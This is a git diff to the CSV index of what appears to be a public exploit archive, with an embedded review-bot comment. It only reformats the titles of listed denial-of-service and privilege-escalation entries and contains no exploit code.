diff --git a/files.csv b/files.csv
index 37f9626c8..6dffef49d 100644
--- a/files.csv
+++ b/files.csv
@@ -438,7 +438,7 @@ id,file,description,date,author,platform,type,port
 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0
 2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
 2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0
-2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0
+2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service",2006-12-15,rgod,windows,dos,0
 2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0
 2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 - (RETR) Remote Denial of Service",2006-12-17,Necro,windows,dos,0
 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0
@@ -736,7 +736,7 @@ id,file,description,date,author,platform,type,port
 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0
-5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
+5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
 5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
 5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
@@ -846,9 +846,9 @@ id,file,description,date,author,platform,type,port
 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0
 6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service",2008-10-29,"Jeremy Brown",windows,dos,0
 6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash (PoC)",2008-11-01,DeltahackingTEAM,windows,dos,0
-7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) - Denial of Service",2008-11-08,hkm,hardware,dos,0
+7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,hardware,dos,0
 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 (OSX) - Multiple Buffer Overflow Vulnerabilities (PoC)",2008-11-11,xwings,osx,dos,0
-7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0
+7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - 'URL Protocol' Remote Unicode Buffer Overflow (PoC)",2008-11-11,Nine:Situations:Group,windows,dos,0
 7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0
 7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - 'Community' Remote Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",windows,dos,0
 7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow (PoC)",2008-11-12,"Praveen Darshanam",linux,dos,0
@@ -1459,7 +1459,7 @@ id,file,description,date,author,platform,type,port
 11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0
 11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' (PoC)",2010-03-30,"Richard leahy",windows,dos,0
 11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0
-11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0
+11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File Exploit (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0
 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0
 11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From '.PDF'",2010-03-31,"Didier Stevens",windows,dos,0
 12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0
@@ -1602,7 +1602,7 @@ id,file,description,date,author,platform,type,port
 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0
 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
 13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987
-13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - (SEH) (PoC)",2010-06-22,blake,windows,dos,0
+13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)",2010-06-22,blake,windows,dos,0
 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0
 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080
 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80
@@ -1702,7 +1702,7 @@ id,file,description,date,author,platform,type,port
 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0
 14892,platforms/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf' 'smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0
 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos,0
-14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0
+14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow Crash (SEH) (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0
 14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution",2010-09-06,Abysssec,windows,dos,0
 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0
 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0
@@ -1971,7 +1971,7 @@ id,file,description,date,author,platform,type,port
 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
 17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0
-17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
+17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Playlist Local File Integer Overflow",2011-06-08,TecR0c,windows,dos,0
 17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0
 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0
 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0
@@ -2546,7 +2546,7 @@ id,file,description,date,author,platform,type,port
 20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0
 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0
 20907,platforms/windows/dos/20907.sh,"Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",windows,dos,0
-20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - (SEH) Overwrite",2012-08-29,Ciph3r,windows,dos,0
+20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - Overwrite (SEH)",2012-08-29,Ciph3r,windows,dos,0
 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0
 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0
 20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos,0
@@ -2697,7 +2697,7 @@ id,file,description,date,author,platform,type,port
 21821,platforms/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0
 21823,platforms/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0
 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos,0
-21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - (SEH) Buffer Overflow (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0
+21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0
 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0
 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
 21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0
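Review bot: The new description for id 21826 loses the space after the separator dash (`FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)`), so it no longer follows the `Title - Description` layout that every other record in these hunks uses and will look like a different product name to anything that splits the field on ` - `. Restore the space: `"FL Studio 10 Producer Edition - Buffer Overflow (SEH) (PoC)"`. The same reordering elsewhere in the commit (for example 14909, 36847, 39447) keeps the separator intact, so this one appears to be an editing slip rather than intent.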
@@ -3060,10 +3060,10 @@ id,file,description,date,author,platform,type,port
 23540,platforms/freebsd/dos/23540.c,"KAME Racoon - 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",freebsd,dos,0
 23543,platforms/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 - Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",multiple,dos,0
 23556,platforms/multiple/dos/23556.txt,"GetWare Web Server Component - Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",multiple,dos,0
-23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - (DownloadURLToFile()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
-23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - (Load()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
-23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - (CheckCompatibility()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
-23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
+23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
+23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
+23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
+23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0
 23584,platforms/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 
- Agent HTTP POST Buffer Mismanagement",2004-01-22,cyber_flash,windows,dos,0
 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0
@@ -3082,7 +3082,7 @@ id,file,description,date,author,platform,type,port
 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0
 23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0
 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0
-23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
+23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
 23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0
 23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0
 23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0
@@ -3549,7 +3549,7 @@ id,file,description,date,author,platform,type,port
 27765,platforms/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos,0
 27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0
 27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0
-27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow",2013-08-22,x90c,linux,dos,139
+27778,platforms/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,linux,dos,139
 27790,platforms/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0
 27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0
 27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library - Heap Corruption",2006-05-09,"Ruben Santamarta",windows,dos,0
@@ -4432,8 +4432,8 @@ id,file,description,date,author,platform,type,port
 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0
 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
-35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0
-35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0
+35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos,0
+35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos,0
 35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos,0
 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
 35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0
@@ -4532,7 +4532,7 @@ id,file,description,date,author,platform,type,port
 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0
 36841,platforms/windows/dos/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,dos,0
-36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - (SEH) Overflow Crash (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0
+36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - Overflow Crash (SEH) (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0
 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0
 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0
 36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0
@@ -4791,7 +4791,7 @@ id,file,description,date,author,platform,type,port
 38556,platforms/android/dos/38556.txt,"Samsung - seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0
 38557,platforms/android/dos/38557.txt,"Samsung fimg2d - FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0
 38558,platforms/android/dos/38558.txt,"Samsung - SecEmailComposer QUICK_REPLY_BACKGROUND Permissions",2015-10-28,"Google Security Research",android,dos,0
-38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
+38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
 38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0
 38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0
@@ -4816,7 +4816,7 @@ id,file,description,date,author,platform,type,port
 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0
 38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0
 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)",2015-11-12,"Nipun Jaswal",windows,dos,0
-38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0
+38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,dos,0
 38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0
 38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0
 38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)",2015-11-16,"Nipun Jaswal",windows,dos,0
@@ -5001,7 +5001,7 @@ id,file,description,date,author,platform,type,port
 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
 39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
-39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - (SEH)Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
+39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0
 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
 39454,platforms/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos,0
 39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
@@ -5052,7 +5052,7 @@ id,file,description,date,author,platform,type,port
 39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
 39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
-39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) Denial of Service",2016-03-14,INSECT.B,windows,dos,0
+39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)",2016-03-14,INSECT.B,windows,dos,0
 39560,platforms/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
 39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
@@ -5183,7 +5183,7 @@ id,file,description,date,author,platform,type,port
 39994,platforms/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0
 40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
 40031,platforms/multiple/dos/40031.txt,"Symantec AntiVirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0
-40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - Remote Stack Buffer Overflow in dec2lha Library",2016-06-29,"Google Security Research",multiple,dos,0
+40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
 40034,platforms/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0
 40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
 40036,platforms/multiple/dos/40036.txt,"Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
@@ -5550,7 +5550,7 @@ id,file,description,date,author,platform,type,port
 42188,platforms/multiple/dos/42188.html,"WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions",2017-06-16,"Google Security Research",multiple,dos,0
 42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0
 42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0
-42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0
+42191,platforms/multiple/dos/42191.html,"WebKit JSC - 'Intl.getCanonicalLocales' Heap Buffer Overflow",2017-06-16,"Google Security Research",multiple,dos,0
 42198,platforms/linux/dos/42198.txt,"GNU binutils - 'rx_decode_opcode' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 42199,platforms/linux/dos/42199.txt,"GNU binutils - 'disassemble_bytes' Heap Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 42200,platforms/linux/dos/42200.txt,"GNU binutils - 'bfd_get_string' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
@@ -5672,7 +5672,7 @@ id,file,description,date,author,platform,type,port
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
 15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0
 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0
-29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0
+29,platforms/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Privilege Escalation",2003-05-12,bob,bsd,local,0
 31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0
 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0
